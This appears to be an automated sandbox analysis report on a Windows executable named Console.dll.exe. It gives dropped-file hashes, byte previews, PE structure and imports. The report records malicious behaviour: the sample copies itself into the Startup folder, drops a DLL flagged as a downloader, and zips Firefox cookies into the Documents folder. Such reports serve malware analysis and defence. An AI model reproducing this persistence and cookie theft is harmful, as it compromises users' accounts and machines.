                                                                                                                                                                                                                        SHA-256:7D6584D35824B681524A80BE15DECCC08FD5B35BE182CAEF479B1E9E71168966
                                                                                                                                                                                                                        SHA-512:95A9E005CB2AF1EEFE3560BFBDE5CF1C2C49AB83FC83F652C7E1C499448A12CD3D1DB9787963C5B1D58F0A4209ADA8F964E4FEC2B085CB3F46039F6B3FC2D9D3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R............." ..0.................. ........... ....................... ......>7....`.................................q...O.......$................)..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................H.......P ..................... .......................................BSJB............v4.0.30319......l...$O..#~...O..(b..#Strings............#US.........#GUID..........#Blob......................3................................e.....b/........L%.O...).O....RO..EP.......+..:.:4..J$:4...&S0...+.O...%.O...(:4...&:4...":4....:4....:4..U&:4....:4.................N.....N.....N..)..N..1..N..9..N..A..N..Q..N .Y..N..a..N..i..N..q..N..y..N.....N.....N......R.....[.....z...#.....+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):101136
                                                                                                                                                                                                                        Entropy (8bit):5.502704018826745
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:uYsYXj0p2NYq5V4bgDHsPdIpuSE5L3Ukcz9wmS0irC4dezJp:jMkYe4bgDUAxCmSJI/
                                                                                                                                                                                                                        MD5:449D3EC3245F31F93C881F333D3E4370
                                                                                                                                                                                                                        SHA1:D362A8078972C5D2904E8C90CC43C892A420C545
                                                                                                                                                                                                                        SHA-256:EBCF557A761091F253CF0BF8B33C928C94EE5C8B6DCF086ADDDD685D19A63653
                                                                                                                                                                                                                        SHA-512:A364C91828FC252A734257C77F346ED50897F218C3B579201D634809575FDFF81C6B7028D67DFA21A040C5C4C2FC73CD6F20820EA25CB0FA3987DA26A08901B8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i............" ..0..X...........v... ........... ..............................Y4....`.................................?v..O.......4............b...)..........hu..T............................................ ............... ..H............text....V... ...X.................. ..`.rsrc...4............Z..............@..@.reloc...............`..............@..B................sv......H.......P ...T...................t......................................BSJB............v4.0.30319......l...`...#~..... ...#Strings.....Q......#US..Q......#GUID....R......#Blob......................3............................P...,......H.........5....:....'...m......,.@..5#.T..P4.T...7.J...B....i5....u:.T..n7.T..&1.T.....T.../.T..(7.T...(.T.............................)....1....9....A....Q.. .Y....a....i....q....y..........................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\sni.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):136488
                                                                                                                                                                                                                        Entropy (8bit):6.734245647987289
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H3SGhrfrdqCn3bctzdGRX18u5e++dowahamD5/f+vHPoW:H3SGhbBqCnmzERyiepSUm9moW
                                                                                                                                                                                                                        MD5:C62A83F20BC23AEFACE70EC13003C4C5
                                                                                                                                                                                                                        SHA1:35553CFCDCBECCDC49710E68AEC495C16880F0BD
                                                                                                                                                                                                                        SHA-256:1446D6B26DA49A5A9F366972F89F4E236F916955F31DDC38EBB96217C1CACE9C
                                                                                                                                                                                                                        SHA-512:4DDA44FD5B538F5DA9E8CB46A3AB1BDC14B43425B9A61249ECCC925D986AF7B8B3548DB9490238F14807909ECF479415117141DDB344119438A59F97E894EA37
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1T..bT..bT..b].ibX..bo..c^..bo..cu..bo..c[..b.Y1b[..bT..b..b...cD..b...cU..b...bU..b...cU..bRichT..b................PE..L....hfY.........."!.....^..........p........p...............................0.......V....@A............................X..............................(?......@.......T...............................@............p..T............................text....\.......^.................. ..`.rdata...U...p...V...b..............@..@.data....-..........................@....rsrc...............................@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\websocket-sharp.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):226816
                                                                                                                                                                                                                        Entropy (8bit):5.8043063296433735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:HHOD3s/RCKVA0RZg3WfWreo10EHwtAmPWaJNCKLLXKMWwNI58MBTJkajsNlVU1sU:Ks/TVlZgGXo2EHwoV8MJJ5NQZSJgI
                                                                                                                                                                                                                        MD5:169D5BAE15E2C6DC13386A8AA34CE367
                                                                                                                                                                                                                        SHA1:FA2F5085473304191A4684DA5B38935105906178
                                                                                                                                                                                                                        SHA-256:339C740207F308D9E86B03A4D45D29F17C52476D1ECDA88AFA9F607966D226FC
                                                                                                                                                                                                                        SHA-512:F28381088FE3BE65570E3E2E2A0C07632BC05416F53058C7125D3F02D44063BD56A5544E0076A38E278A955A4F3BC26BA49CD46333F7A58C96005EAFE6234970
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0..j..........>.... ........... ..............................>.....@....................................O.......0...........................@...8............................................ ............... ..H............text...\i... ...j.................. ..`.rsrc...0............l..............@..@.reloc...............t..............@..B........................H.......0...............................................................J.("....~N...}....*&...(....*&...(....*:.(".....}....*R.("......s....}....*&...(....*..{....*2.{....o....*V.{....o....%-.&~#...*..{....*"..}....*&...(....*V.(".....}......}....*..{....*..{....*....0..#.........j-..*.s$.....(........,..o......*..................0..X.......s%.....o&...-..*..jo'......s(...... ....o)....o*....~......o+.....jo'........,..o......*......!.+L.......0.."........(......o*....o,....

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):77426070
                                                                                                                                                                                                                        Entropy (8bit):6.781006665108723
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:l3a4EjQOm/lQqYrsUDOsPbOLcD1UW+hdYzXe:l3WjfOOysCe4
                                                                                                                                                                                                                        MD5:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        SHA1:2C8B8F1C993C37FA8464CBF81E787FB1BDA5ABC1
                                                                                                                                                                                                                        SHA-256:A3229A8A550CD643FD7B33C1265CA01B22370129D7374A099A3AC343C0E5BF3A
                                                                                                                                                                                                                        SHA-512:96B6F9C088A36633CA11E445C7A978A760A0A573FE71F6BFF049BFDCDE1F9F40496763A74DA41B25CB3A7699A80D8BC169C9B9875612AA1E1357960D0BAF9EEF
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G................(......,.......,.......,..^...H......H.............../......./...../......./D....../......Rich............................PE..L......e...............'..S...........N.......S...@..........................P............@......................... Eg......Eg.h.....i..v...................P.. .....`.T...................@.a.....`7T.@.............S......Cg.`....................text....S.......S................. ..`.CLR_UEFD.....S.......S............. ..`.rdata..n.....S.......S.............@..@.data....;...pg..r...Ng.............@....didat........h.......g.............@..._RDATA........h.......g.............@..@.rsrc....v....i..x....h.............@..@.reloc.. ....P.......J~.............@..B................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe:Zone.Identifier

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                        C:\Users\user\Documents\887849 - FIREFOX.zip

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):702
                                                                                                                                                                                                                        Entropy (8bit):6.626732290929846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:5j6KI8WlzVNlxrovvAR0D4uZV7TL+fdH69iDcHKIKWla0:9hAlzNxrYAC1ZVHw64YqvG
                                                                                                                                                                                                                        MD5:C41896CC51E2156572BA3B5BEABE06DE
                                                                                                                                                                                                                        SHA1:7BFC06FC7D19D302CFB6F7E5040F3A0D3A18A018
                                                                                                                                                                                                                        SHA-256:9D80BA44FE55289DF10A4F8AF7AC26E88F0CA8DF04218F5C3032111CCA754F55
                                                                                                                                                                                                                        SHA-512:126DA789198F0420AA0B8DF5F5CB9ECC63607E9C9AB877A5C5E947468725124EECA0B04A62CE75ECF2CB50BA8CE294A1285A4E10B579D7D47CFC306C1AAADEED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:PK........-.EW~.3.........'...fu7wner3.default-release\cookies.sqlite..M..@...+*....A.".x..Q...~...X...6.$.......?.x.h...U......f..&o.L...Y...y..T.j..5.....(Z;h..u;......8k.....5.}..}y.............................................J.O....$._di.2l....Q.F..n.V..B.$tz..v<....{...p7~..y.=.f.*....9...B._.q..n....(.?...d'.....d.8.o.eu0.'...0}=.7..l.iRV..$-..(.V..iRe.l..G..f.0.,..V.T.?.....6..U..q].tV...a.[..S.fUz\.H^....'......q....p4h..*/f..".K<.u...paY...^._.|......F#.fO.....c+YT..|k..m]Y...w...B.[v{~@................................og......................................oPK..........-.EW~.3.........'.................fu7wner3.default-release\cookies.sqlitePK..........U...S.....

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.781006665108723
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:Console.dll.exe
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5:3dabbdb09892b980b8b48deeec718e63
                                                                                                                                                                                                                        SHA1:2c8b8f1c993c37fa8464cbf81e787fb1bda5abc1
                                                                                                                                                                                                                        SHA256:a3229a8a550cd643fd7b33c1265ca01b22370129d7374a099a3ac343c0e5bf3a
                                                                                                                                                                                                                        SHA512:96b6f9c088a36633ca11e445c7a978a760a0a573fe71f6bff049bfdcde1f9f40496763a74da41b25cb3a7699a80d8bc169c9b9875612aa1e1357960d0baf9eef
                                                                                                                                                                                                                        SSDEEP:1572864:l3a4EjQOm/lQqYrsUDOsPbOLcD1UW+hdYzXe:l3WjfOOysCe4
                                                                                                                                                                                                                        TLSH:F408BF11B3D88A36E5AF067580B6E655C3BDE9161335EBCF2648F69818723D18D323E3
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.................(......,.......,.......,..^...H.......H................/......./......./......./D....../......Rich...........

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:033fcd73732c273e

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x8ebeb0
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x65F9E8FC [Tue Mar 19 19:35:24 2024 UTC]
                                                                                                                                                                                                                        TLS Callbacks:0x8eb3e0, 0x8ebb60
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:aa9f3a2087e12b9bb85387e33424b173

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        call 00007F740CB3F05Bh
                                                                                                                                                                                                                        jmp 00007F740CB3EA0Dh
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        push FFFFFFFFh
                                                                                                                                                                                                                        push 0093C3B9h
                                                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ecx
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        mov eax, dword ptr [00A77040h]
                                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-10h], esp
                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                        and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                        call 00007F740C8A8956h
                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                        jmp 00007F740CB3EBAAh
                                                                                                                                                                                                                        mov eax, 008EBEF8h
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                        jmp 00007F740CB3EB47h
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        push 008ECDF0h
                                                                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                                                                        mov eax, dword ptr [esp+10h]
                                                                                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                        lea ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                        sub esp, eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        mov eax, dword ptr [00A77040h]
                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                                        push dword ptr [ebp-08h]
                                                                                                                                                                                                                        mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        and dword ptr [00A7E470h], 00000000h
                                                                                                                                                                                                                        sub esp, 24h
                                                                                                                                                                                                                        or dword ptr [00A77090h], 00000000h

                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x6745200xc4.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6745e40x168.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x69d0000x1576c8.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f50000x3ff20.reloc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x60ffc00x54.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x6100400x18.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5437600x40.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x53e0000x71c.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x6743180x60.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x53b9ca0x53ba0027028f6c227e03e80edd3fa24fa8760bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .CLR_UEF0x53d0000x440x200f2b641ed546bf3bc31d08dec881d9e8cFalse0.134765625data0.9578521415731932IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x53e0000x138c6e0x138e00c8df93ee833a4a778ad2ddff72671a8fFalse0.37248582950459447data5.154013666287243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x6770000x13bc40x7200adfede934d7861c18f399ebbc75df063False0.2565446820175439Matlab v4 mat-file (little endian) \377\377\377\377, numeric, rows 0, columns 03.8031276484007046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .didat0x68b0000x1c0x20034950fe11f3a721d87970a33d0128597False0.0546875data0.25996289920834015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        _RDATA0x68c0000x10f100x11000211089d7d672e1712b48c26d0bdc0a1bFalse0.16291360294117646data5.364619170209927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x69d0000x1576c80x15780023d927bbfc4be587a93d613bdebcfddbFalse0.40919034866266374data6.384281088343183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .reloc0x7f50000x3ff200x40000863392d201ba4cd20ac6b106854bdf4fFalse0.5942230224609375data6.669163867222735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_ICON0x69d29c0x9788PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990461950917715
                                                                                                                                                                                                                        RT_ICON0x6a6a240x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.1875517567727434
                                                                                                                                                                                                                        RT_ICON0x6b724c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.26363958431743034
                                                                                                                                                                                                                        RT_ICON0x6bb4740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.3233402489626556
                                                                                                                                                                                                                        RT_ICON0x6bda1c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.40689493433395874
                                                                                                                                                                                                                        RT_ICON0x6beac40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.650709219858156
                                                                                                                                                                                                                        RT_RCDATA0x6bef2c0x24data1.1666666666666667
                                                                                                                                                                                                                        RT_RCDATA0x6bef500x24data1.1666666666666667
                                                                                                                                                                                                                        RT_RCDATA0x6bef740x1351a0PE32 executable (DLL) (GUI) Intel 80386, for MS Windows0.41257476806640625
                                                                                                                                                                                                                        RT_GROUP_ICON0x7f41140x5adata0.7666666666666667
                                                                                                                                                                                                                        RT_VERSION0x7f41700x2acdata0.4327485380116959
                                                                                                                                                                                                                        RT_MANIFEST0x7f441c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllRaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, InitializeContext, CopyContext, SetXStateFeaturesMask, WerRegisterRuntimeExceptionModule, GetSystemDefaultLCID, GetUserDefaultLCID, OutputDebugStringA, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, QueryThreadCycleTime, SetThreadGroupAffinity, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetModuleFileNameW, CreateProcessW, GetCPInfo, GetTempPathW, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, CreateFileMappingW, MapViewOfFile, GetActiveProcessorGroupCount, GetCurrentProcessorNumberEx, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, FindClose, LoadLibraryA, GetCurrentDirectoryW, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, ReadProcessMemory, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, WideCharToMultiByte, DeleteCriticalSection, InitializeCriticalSection, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetWriteWatch, GetLargePageMinimum, ResetWriteWatch, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, TlsFree, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, GetSystemTimeAsFileTime
                                                                                                                                                                                                                        ADVAPI32.dllRegQueryValueExW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, ReportEventW, RegisterEventSourceW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
                                                                                                                                                                                                                        ole32.dllCoCreateFreeThreadedMarshaler, CreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoGetClassObject
